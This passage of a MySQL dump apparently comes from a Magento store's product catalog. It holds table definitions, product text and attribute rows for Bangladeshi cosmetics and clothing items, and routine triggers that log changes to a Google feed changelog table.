INSERT INTO `catalog_product_entity_media_gallery_value` (`value_id`, `store_id`, `entity_id`, `label`, `position`, `disabled`, `record_id`) VALUES
(2969, 0, 1776, '', 1, 0, 2975),
(3427, 0, 2052, '', 1, 0, 3433),
(3428, 0, 2053, '', 1, 0, 3434),
(3429, 0, 2053, '', 2, 0, 3435),
(3430, 0, 2053, '', 3, 0, 3436),
(3437, 0, 2059, NULL, 1, 0, 3461),
(3447, 0, 2062, NULL, 2, 0, 3471),
(3448, 0, 2062, NULL, 2, 0, 3472),
(3449, 0, 2063, NULL, 2, 0, 3475),
(3450, 0, 2063, NULL, 3, 0, 3476),
(3451, 0, 2061, NULL, 3, 0, 3479),
(3452, 0, 2061, NULL, 4, 0, 3480),
(3453, 0, 2054, NULL, 2, 0, 3481),
(3454, 0, 2054, NULL, 3, 0, 3482),
(3455, 0, 2060, NULL, 2, 0, 3483),
(3456, 0, 2060, NULL, 3, 0, 3484),
(3457, 0, 2057, NULL, 2, 0, 3485),
(3458, 0, 2057, NULL, 3, 0, 3486),
(3459, 0, 2055, NULL, 2, 0, 3487),
(3460, 0, 2055, NULL, 3, 0, 3488),
(3461, 0, 2058, NULL, 2, 0, 3489),
(3462, 0, 2058, NULL, 3, 0, 3490),
(3463, 0, 2064, NULL, 1, 0, 3509),
(3464, 0, 2064, NULL, 2, 0, 3510),
(3465, 0, 2064, NULL, 0, 0, 3511);

--
-- Triggers `catalog_product_entity_media_gallery_value`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_media_gallery_value_after_delete` AFTER DELETE ON `catalog_product_entity_media_gallery_value` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_media_gallery_value_after_insert` AFTER INSERT ON `catalog_product_entity_media_gallery_value` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_media_gallery_value_after_update` AFTER UPDATE ON `catalog_product_entity_media_gallery_value` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`label` <=> OLD.`label`) OR NOT(NEW.`position` <=> OLD.`position`) OR NOT(NEW.`disabled` <=> OLD.`disabled`) OR NOT(NEW.`record_id` <=> OLD.`record_id`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_media_gallery_value_to_entity`
--

CREATE TABLE `catalog_product_entity_media_gallery_value_to_entity` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value media Entry ID',
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Product Entity ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Link Media value to Product entity table';

--
-- Dumping data for table `catalog_product_entity_media_gallery_value_to_entity`
--

INSERT INTO `catalog_product_entity_media_gallery_value_to_entity` (`value_id`, `entity_id`) VALUES
(2969, 1776),
(3427, 2052),
(3428, 2053),
(3429, 2053),
(3430, 2053),
(3437, 2059),
(3447, 2062),
(3448, 2062),
(3449, 2063),
(3450, 2063),
(3451, 2061),
(3452, 2061),
(3453, 2054),
(3454, 2054),
(3455, 2060),
(3456, 2060),
(3457, 2057),
(3458, 2057),
(3459, 2055),
(3460, 2055),
(3461, 2058),
(3462, 2058),
(3463, 2064),
(3464, 2064),
(3465, 2064);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_media_gallery_value_video`
--

CREATE TABLE `catalog_product_entity_media_gallery_value_video` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Media Entity ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `provider` varchar(32) DEFAULT NULL COMMENT 'Video provider ID',
  `url` text DEFAULT NULL COMMENT 'Video URL',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `description` text DEFAULT NULL COMMENT 'Page Meta Description',
  `metadata` text DEFAULT NULL COMMENT 'Video meta data'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Video Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_text`
--

CREATE TABLE `catalog_product_entity_text` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` text DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Text Attribute Backend Table';

--
-- Dumping data for table `catalog_product_entity_text`
--

INSERT INTO `catalog_product_entity_text` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(1790, 75, 0, 1776, '<p>You\'ve earned your figure, so stay cool and let it do all the talking in the form-fitted, sleek racerback Chloe Compete Tank. Designed for total range of motion and performance, the Nona is made with highly breathable mesh fabric.</p>\n<p>&bull; Royal blue tank top - nylon/spandex.<br />&bull; Flatlock stitching.<br />&bull; Moisture-wicking fabric. <br />&bull; Ergonomic seaming. <br />&bull; Machine wash/dry.</p>'),
(2066, 75, 0, 2052, '<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.</p>\n<p>&bull; Seafoam pattern running shorts.<br />&bull; Elastic waistband.<br />&bull; Snug fit.<br />&bull; 4\'\' inseam.<br />&bull; 76% premium brushed Nylon / 24% Spandex.</p>'),
(2067, 75, 0, 2053, '<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.</p>\n<p>&bull; Seafoam pattern running shorts.<br />&bull; Elastic waistband.<br />&bull; Snug fit.<br />&bull; 4\'\' inseam.<br />&bull; 76% premium brushed Nylon / 24% Spandex.</p>'),
(2068, 75, 0, 2054, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and showing them. I thought about creating a widget but I am not sure on how to show the products on the admin area. Could you please help me show specific products on homepage?\r\n\r\n'),
(2069, 76, 0, 2054, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a \r\n\r\n'),
(2070, 85, 0, 2054, 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ '),
(2071, 75, 0, 2055, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and showing them. I thought about creating a widget but I am not sure on how to show the products on the admin area. Could you please help me show specific products on homepage?\r\n\r\n'),
(2072, 76, 0, 2055, 'I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and showing them. I thought about creating a widget but I am not sure on how to show the products on the admin area. Could you please help me show specific products on homepage?\r\n\r\n'),
(2073, 85, 0, 2055, 'G clean Handwash Liquid Soap Pump 200ml'),
(2075, 85, 0, 2057, 'G clean Handwash Liquid Soap Pump 200ml  '),
(2076, 75, 0, 2058, '<p>In the best formula of the Ramy brand, the new addition Ramy Spotless Fairness cream.</p>\r\n<p>Eliminates black spots and uneven colors on the face.</p>'),
(2077, 76, 0, 2058, '<p>In the best formula of the Ramy brand, the new addition Ramy Spotless Fairness cream.Eliminates black spots and uneven colors on the face.</p>'),
(2078, 85, 0, 2058, 'RAMY SPOT LESS FAIRNESS CREAM'),
(2079, 85, 0, 2059, 'RAMY MOISTURIZEING FACE WASH'),
(2080, 75, 0, 2059, '<p>Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ</p>'),
(2081, 76, 0, 2059, '<p>Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ</p>'),
(2082, 75, 0, 2060, '<p>Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ</p>'),
(2083, 76, 0, 2060, '<p>Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-E, diethylene, glycerol. Produ</p>'),
(2084, 85, 0, 2060, ' Ramy Moisturizeing Face Wash Ornamental lemon extract made from natural'),
(2085, 85, 0, 2061, 'Ramy Spot Cleaner Cream'),
(2086, 75, 0, 2062, '<p>roduct name: Ramy Mesta Guard Category: Face Care Cream. Slogan: Increase beauty (through healing Mesta). Active ingredients of the product: Allantoin, Zinc Oxide. Product Features and Benefits: Rich in Vitamin E</p>'),
(2087, 76, 0, 2062, '<p>roduct name: Ramy Mesta Guard Category: Face Care Cream. Slogan: Increase beauty (through healing Mesta). Active ingredients of the product: Allantoin, Zinc Oxide. Product Features and Benefits: Rich in Vitamin E</p>'),
(2088, 85, 0, 2062, 'Ramy Mesta Guard'),
(2089, 75, 0, 2063, '<p>First, wash your face thoroughly with Ramy Facewash Wipe the face with a clean towel Now massage the Ramy Mesta Guard area (i.e. the surface of the Mesta ) well. Use at least 2 times a day. Do not stop using until the Mesta is removed.</p>'),
(2090, 76, 0, 2063, '<p>First, wash your face thoroughly with Ramy Facewash Wipe the face with a clean towel Now massage the Ramy Mesta Guard area (i.e. the surface of the Mesta ) well. Use at least 2 times a day. Do not stop using until the Mesta is removed.</p>'),
(2091, 85, 0, 2063, 'Ramy Mesta Guard Face'),
(2092, 85, 0, 2064, 'New Spot');

--
-- Triggers `catalog_product_entity_text`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_text_after_delete` AFTER DELETE ON `catalog_product_entity_text` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_text_after_insert` AFTER INSERT ON `catalog_product_entity_text` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_text_after_update` AFTER UPDATE ON `catalog_product_entity_text` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_tier_price`
--

CREATE TABLE `catalog_product_entity_tier_price` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `all_groups` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Applicable To All Customer Groups',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `qty` decimal(12,4) NOT NULL DEFAULT 1.0000 COMMENT 'QTY',
  `value` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Value',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `percentage_value` decimal(5,2) DEFAULT NULL COMMENT 'Percentage value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Tier Price Attribute Backend Table';

--
-- Triggers `catalog_product_entity_tier_price`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_tier_price_after_delete` AFTER DELETE ON `catalog_product_entity_tier_price` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_tier_price_after_insert` AFTER INSERT ON `catalog_product_entity_tier_price` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_tier_price_after_update` AFTER UPDATE ON `catalog_product_entity_tier_price` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`all_groups` <=> OLD.`all_groups`) OR NOT(NEW.`customer_group_id` <=> OLD.`customer_group_id`) OR NOT(NEW.`qty` <=> OLD.`qty`) OR NOT(NEW.`value` <=> OLD.`value`) OR NOT(NEW.`website_id` <=> OLD.`website_id`) OR NOT(NEW.`percentage_value` <=> OLD.`percentage_value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_varchar`
--

CREATE TABLE `catalog_product_entity_varchar` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Varchar Attribute Backend Table';

--
-- Dumping data for table `catalog_product_entity_varchar`
--

INSERT INTO `catalog_product_entity_varchar` (`value_id`, `attribute_id`, `store_id`, `entity_id`, `value`) VALUES
(13173, 106, 0, 1776, 'container2'),
(13174, 120, 0, 1776, '0'),
(13175, 123, 0, 1776, 'chloe-compete-tank-xl-yellow'),
(13176, 87, 0, 1776, '/w/t/wt06-yellow_main_1.jpg'),
(13177, 88, 0, 1776, '/w/t/wt06-yellow_main_1.jpg'),
(13178, 89, 0, 1776, '/w/t/wt06-yellow_main_1.jpg'),
(13179, 73, 0, 1776, 'Chloe Compete Tank-XL-Yellow'),
(15217, 106, 0, 2052, 'container2'),
(15218, 120, 0, 2052, '0'),
(15219, 123, 0, 2052, 'erika-running-short-32-red'),
(15220, 87, 0, 2052, '/w/s/wsh12-red_main_1.jpg'),
(15221, 88, 0, 2052, '/w/s/wsh12-red_main_1.jpg'),
(15222, 89, 0, 2052, '/w/s/wsh12-red_main_1.jpg'),
(15223, 73, 0, 2052, 'Erika Running Short-32-Red'),
(15224, 106, 0, 2053, 'container2'),
(15225, 120, 0, 2053, '0'),
(15226, 123, 0, 2053, 'erika-running-short'),
(15227, 87, 0, 2053, '/w/s/wsh12-green_main_1.jpg'),
(15228, 88, 0, 2053, '/w/s/wsh12-green_main_1.jpg'),
(15229, 89, 0, 2053, '/w/s/wsh12-green_main_1.jpg'),
(15230, 73, 0, 2053, 'Erika Running Short'),
(15231, 152, 0, 2053, '5532,5538'),
(15232, 140, 0, 2053, '5580,5465,5577'),
(15233, 156, 0, 2053, '5622'),
(15234, 157, 0, 2053, '5638,5632,5635'),
(15263, 73, 0, 2054, 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ '),
(15264, 84, 0, 2054, 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ '),
(15265, 86, 0, 2054, 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳  I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting pro'),
(15266, 87, 0, 2054, '/r/u/ruchi-tomato-ketchup-.jpg'),
(15267, 88, 0, 2054, '/r/u/ruchi-tomato-ketchup-.jpg'),
(15268, 89, 0, 2054, '/r/u/ruchi-tomato-ketchup-.jpg'),
(15269, 106, 0, 2054, 'container2'),
(15270, 120, 0, 2054, '0'),
(15271, 123, 0, 2054, 'g-clean-handwash-liquid-soap-pump-200ml-200-00'),
(15272, 129, 0, 2054, '2'),
(15273, 136, 0, 2054, '/r/u/ruchi-tomato-ketchup-.jpg'),
(15278, 73, 0, 2055, 'G clean Handwash Liquid Soap Pump 200ml'),
(15279, 84, 0, 2055, 'G clean Handwash Liquid Soap Pump 200ml'),
(15280, 86, 0, 2055, 'G clean Handwash Liquid Soap Pump 200ml I am trying to find a way to show specific products (that I will select from the admin area) in Homepage. I see there is a widget for products from a specific category but there is none for selecting products and sh'),
(15281, 87, 0, 2055, '/1/3/13-dudh-500-ml-2.png'),
(15282, 88, 0, 2055, '/1/3/13-dudh-500-ml-2.png'),
(15283, 89, 0, 2055, '/1/3/13-dudh-500-ml-2.png'),
(15284, 106, 0, 2055, 'container2'),
(15285, 120, 0, 2055, '0'),
(15286, 123, 0, 2055, 'g-clean-handwash-liquid-soap-pump-200ml'),
(15287, 129, 0, 2055, '2'),
(15288, 136, 0, 2055, '/1/3/13-dudh-500-ml-2.png'),
(15316, 73, 0, 2057, 'G clean Handwash Liquidd Soap Pump 200ml  '),
(15317, 84, 0, 2057, 'G clean Handwash Liquid Soap Pump 200ml  '),
(15318, 86, 0, 2057, 'G clean Handwash Liquid Soap Pump 200ml   '),
(15319, 87, 0, 2057, '/r/o/rosmalai-600gm.png'),
(15320, 88, 0, 2057, '/r/o/rosmalai-600gm.png'),
(15321, 89, 0, 2057, '/r/o/rosmalai-600gm.png'),
(15322, 106, 0, 2057, 'container2'),
(15323, 120, 0, 2057, '0'),
(15324, 123, 0, 2057, 'g-clean-handwash-liquidd-soap-pump-200ml'),
(15325, 129, 0, 2057, '2'),
(15326, 136, 0, 2057, '/r/o/rosmalai-600gm.png'),
(15331, 73, 0, 2058, 'Face Wash Ornamental lemon extract'),
(15332, 84, 0, 2058, 'RAMY SPOT LESS FAIRNESS CREAM'),
(15333, 86, 0, 2058, 'RAMY SPOT LESS FAIRNESS CREAM In the best formula of the Ramy brand, the new addition Ramy Spotless Fairness cream.\r\nEliminates black spots and uneven colors on the face.'),
(15334, 87, 0, 2058, '/t/r/trix-dish-wash-liquid-.jpg'),
(15335, 88, 0, 2058, '/t/r/trix-dish-wash-liquid-.jpg'),
(15336, 89, 0, 2058, '/t/r/trix-dish-wash-liquid-.jpg'),
(15337, 106, 0, 2058, 'container1'),
(15338, 120, 0, 2058, '0'),
(15339, 123, 0, 2058, 'ramy-spot-less-fairness-cream'),
(15340, 129, 0, 2058, '2'),
(15341, 136, 0, 2058, '/t/r/trix-dish-wash-liquid-.jpg'),
(15346, 100, 0, 2058, '4'),
(15347, 104, 0, 2058, '1column'),
(15348, 114, 0, 2058, 'BD'),
(15349, 116, 0, 2058, '1column'),
(15358, 73, 0, 2059, 'Face Wash Ornamental lemon extract'),
(15359, 84, 0, 2059, 'RAMY MOISTURIZEING FACE WASH'),
(15360, 86, 0, 2059, 'RAMY MOISTURIZEING FACE WASH '),
(15361, 100, 0, 2059, '4'),
(15362, 104, 0, 2059, '1column'),
(15363, 106, 0, 2059, 'container1'),
(15364, 116, 0, 2059, '1column'),
(15365, 120, 0, 2059, '0'),
(15366, 123, 0, 2059, 'ramy-moisturizeing-face-wash'),
(15367, 129, 0, 2059, '2'),
(15368, 87, 0, 2059, '/v/a/vaslin.png'),
(15369, 88, 0, 2059, '/v/a/vaslin.png'),
(15370, 89, 0, 2059, '/v/a/vaslin.png'),
(15371, 114, 0, 2059, 'BD'),
(15372, 136, 0, 2059, '/v/a/vaslin.png'),
(15381, 73, 0, 2060, 'Face Wash Ornamental lemon extract'),
(15382, 84, 0, 2060, ' Ramy Moisturizeing Face Wash Ornamental lemon extract made from natural'),
(15383, 86, 0, 2060, ' Ramy Moisturizeing Face Wash Ornamental lemon extract made from natural Product name: Ramy Moisturizeing Face Wash : Remy Moiseschrising Faces Category: Facewas Slogan: Natural quality fountain Active ingredients of the product: orangle extract, vitamin-'),
(15384, 87, 0, 2060, '/d/e/dettol-handwash-liquid-soap-pump.jpeg'),
(15385, 88, 0, 2060, '/d/e/dettol-handwash-liquid-soap-pump.jpeg'),
(15386, 89, 0, 2060, '/d/e/dettol-handwash-liquid-soap-pump.jpeg'),
(15387, 100, 0, 2060, '4'),
(15388, 104, 0, 2060, '1column'),
(15389, 106, 0, 2060, 'container1'),
(15390, 114, 0, 2060, 'BD'),
(15391, 116, 0, 2060, '1column'),
(15392, 120, 0, 2060, '0'),
(15393, 123, 0, 2060, 'ramy-moisturizeing-face-wash-ornamental-lemon-extract-made-from-natural'),
(15394, 129, 0, 2060, '2'),
(15395, 136, 0, 2060, '/d/e/dettol-handwash-liquid-soap-pump.jpeg'),
(15404, 73, 0, 2061, 'Ramy Spot Cleaner Cream'),
(15405, 84, 0, 2061, 'Ramy Spot Cleaner Cream'),
(15406, 86, 0, 2061, 'Ramy Spot Cleaner Cream '),
(15407, 87, 0, 2061, '/d/e/dettol-handwash-refill-170ml.jpg'),
(15408, 88, 0, 2061, '/d/e/dettol-handwash-refill-170ml.jpg'),
(15409, 89, 0, 2061, '/d/e/dettol-handwash-refill-170ml.jpg'),
(15410, 100, 0, 2061, '4'),
(15411, 104, 0, 2061, '1column'),
(15412, 106, 0, 2061, 'container1'),
(15413, 116, 0, 2061, '1column'),
(15414, 120, 0, 2061, '0'),
(15415, 123, 0, 2061, 'ramy-spot-cleaner-cream'),
(15416, 129, 0, 2061, '2'),
(15417, 136, 0, 2061, '/d/e/dettol-handwash-refill-170ml.jpg'),
(15430, 73, 0, 2062, 'new Ramy Mesta Guards'),
(15431, 84, 0, 2062, 'Ramy Mesta Guard'),
(15432, 86, 0, 2062, 'Ramy Mesta Guard roduct name: Ramy Mesta Guard Category: Face Care Cream. Slogan: Increase beauty (through healing Mesta). Active ingredients of the product: Allantoin, Zinc Oxide. Product Features and Benefits: Rich in Vitamin E'),
(15433, 87, 0, 2062, '/d/u/dudh-500-ml.png'),
(15434, 88, 0, 2062, '/d/u/dudh-500-ml.png'),
(15435, 89, 0, 2062, '/d/u/dudh-500-ml.png'),
(15436, 100, 0, 2062, '4'),
(15437, 104, 0, 2062, '1column'),
(15438, 106, 0, 2062, 'container1'),
(15439, 116, 0, 2062, '1column'),
(15440, 120, 0, 2062, '0'),
(15441, 123, 0, 2062, 'ramy-mesta-guard'),
(15442, 129, 0, 2062, '2'),
(15443, 136, 0, 2062, 'no_selection'),
(15456, 114, 0, 2062, 'BD'),
(15461, 73, 0, 2063, 'Ramy Mesta Guard Face'),
(15462, 84, 0, 2063, 'Ramy Mesta Guard Face'),
(15463, 86, 0, 2063, 'Ramy Mesta Guard Face First, wash your face thoroughly with Ramy Facewash Wipe the face with a clean towel Now massage the Ramy Mesta Guard area (i.e. the surface of the Mesta ) well. Use at least 2 times a day. Do not stop using until the Mesta is remove'),
(15464, 87, 0, 2063, '/f/r/fresh-soya-bean-oil.png'),
(15465, 88, 0, 2063, '/f/r/fresh-soya-bean-oil.png'),
(15466, 89, 0, 2063, '/f/r/fresh-soya-bean-oil.png'),
(15467, 100, 0, 2063, '4'),
(15468, 104, 0, 2063, '1column'),
(15469, 106, 0, 2063, 'container1'),
(15470, 116, 0, 2063, '1column'),
(15471, 120, 0, 2063, '0'),
(15472, 123, 0, 2063, 'ramy-mesta-guard-face'),
(15473, 129, 0, 2063, '2'),
(15474, 136, 0, 2063, 'no_selection'),
(15475, 73, 0, 2064, 'New Spot'),
(15476, 84, 0, 2064, 'New Spot'),
(15477, 86, 0, 2064, 'New Spot '),
(15478, 87, 0, 2064, '/c/o/cold_cream-05.png'),
(15479, 88, 0, 2064, '/c/o/cold_cream-05.png'),
(15480, 89, 0, 2064, '/c/o/cold_cream-05.png'),
(15481, 104, 0, 2064, '1column'),
(15482, 106, 0, 2064, 'container2'),
(15483, 114, 0, 2064, 'BD'),
(15484, 120, 0, 2064, '0'),
(15485, 123, 0, 2064, 'new-spot'),
(15486, 129, 0, 2064, '2'),
(15487, 136, 0, 2064, '/c/o/cold_cream-05.png');

--
-- Triggers `catalog_product_entity_varchar`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_varchar_after_delete` AFTER DELETE ON `catalog_product_entity_varchar` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_varchar_after_insert` AFTER INSERT ON `catalog_product_entity_varchar` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_entity_varchar_after_update` AFTER UPDATE ON `catalog_product_entity_varchar` FOR EACH ROW BEGIN
IF (NOT(NEW.`value_id` <=> OLD.`value_id`) OR NOT(NEW.`attribute_id` <=> OLD.`attribute_id`) OR NOT(NEW.`store_id` <=> OLD.`store_id`) OR NOT(NEW.`entity_id` <=> OLD.`entity_id`) OR NOT(NEW.`value` <=> OLD.`value`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`entity_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_frontend_action`
--

CREATE TABLE `catalog_product_frontend_action` (
  `action_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Product Action ID',
  `type_id` varchar(64) NOT NULL COMMENT 'Type of product action',
  `visitor_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Visitor ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `added_at` bigint(20) NOT NULL COMMENT 'Added At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Frontend Action Table';

--
-- Dumping data for table `catalog_product_frontend_action`
--

INSERT INTO `catalog_product_frontend_action` (`action_id`, `type_id`, `visitor_id`, `customer_id`, `product_id`, `added_at`) VALUES
(8, 'recently_compared_product', 45, NULL, 2062, 1623212141),
(48, 'recently_compared_product', 46, NULL, 2062, 1623212141),
(57, 'recently_viewed_product', 47, NULL, 2055, 1623220932),
(74, 'recently_viewed_product', 47, NULL, 2058, 1623220932),
(80, 'recently_viewed_product', 48, NULL, 2055, 1623220970),
(126, 'recently_viewed_product', 49, NULL, 2060, 1623208128),
(176, 'recently_viewed_product', 50, NULL, 2058, 1623220932),
(195, 'recently_viewed_product', 51, NULL, 2060, 1623208128),
(205, 'recently_compared_product', 52, NULL, 2062, 1623212141),
(206, 'recently_compared_product', 52, NULL, 2064, 1623226050),
(207, 'recently_compared_product', NULL, 14, 2062, 1623212141),
(213, 'recently_compared_product', NULL, 14, 2064, 1623757971),
(216, 'recently_viewed_product', 56, NULL, 2058, 1623220932),
(220, 'recently_compared_product', 57, NULL, 2064, 1623757971),
(223, 'recently_compared_product', 58, NULL, 2064, 1623757971),
(250, 'recently_viewed_product', 59, NULL, 2058, 1620032077),
(252, 'recently_compared_product', 60, NULL, 2064, 1623757971),
(304, 'recently_viewed_product', 61, NULL, 2058, 1620032077),
(306, 'recently_compared_product', 61, NULL, 2062, 1623845084),
(319, 'recently_viewed_product', NULL, 6, 2058, 1620032077),
(321, 'recently_compared_product', NULL, 6, 2062, 1623845084),
(323, 'recently_viewed_product', 65, NULL, 2058, 1624924800),
(329, 'recently_viewed_product', 73, NULL, 2058, 1635379200),
(335, 'recently_viewed_product', 79, NULL, 2058, 1635811200),
(336, 'recently_viewed_product', 82, NULL, 2058, 1636243200),
(337, 'recently_viewed_product', 83, NULL, 2058, 1636329600),
(339, 'recently_viewed_product', 85, NULL, 2059, 1636556896),
(341, 'recently_viewed_product', 86, NULL, 2059, 1636558245),
(345, 'recently_viewed_product', 89, NULL, 2058, 1636848000),
(346, 'recently_viewed_product', 90, NULL, 2058, 1636848000),
(350, 'recently_viewed_product', 95, NULL, 2058, 1637366400),
(353, 'recently_viewed_product', 99, NULL, 2058, 1637452800),
(355, 'recently_viewed_product', 101, NULL, 2055, 1637452800),
(357, 'recently_viewed_product', 102, NULL, 2058, 1637539200),
(359, 'recently_viewed_product', 103, NULL, 2058, 1637539200),
(363, 'recently_viewed_product', 108, NULL, 2055, 1637884800),
(364, 'recently_viewed_product', 109, NULL, 2058, 1637971200),
(366, 'recently_viewed_product', 112, NULL, 2058, 1637971200),
(373, 'recently_viewed_product', 114, NULL, 2058, 1638403200),
(376, 'recently_viewed_product', 117, NULL, 2053, 1637798400),
(379, 'recently_viewed_product', 122, NULL, 2055, 1638489600),
(380, 'recently_viewed_product', 123, NULL, 2058, 1638489600),
(381, 'recently_viewed_product', 124, NULL, 2055, 1638576000),
(382, 'recently_viewed_product', 125, NULL, 2058, 1638748800),
(384, 'recently_viewed_product', 127, NULL, 2055, 1639008000),
(385, 'recently_viewed_product', 128, NULL, 2059, 1639155999),
(387, 'recently_viewed_product', 130, NULL, 2058, 1639180800),
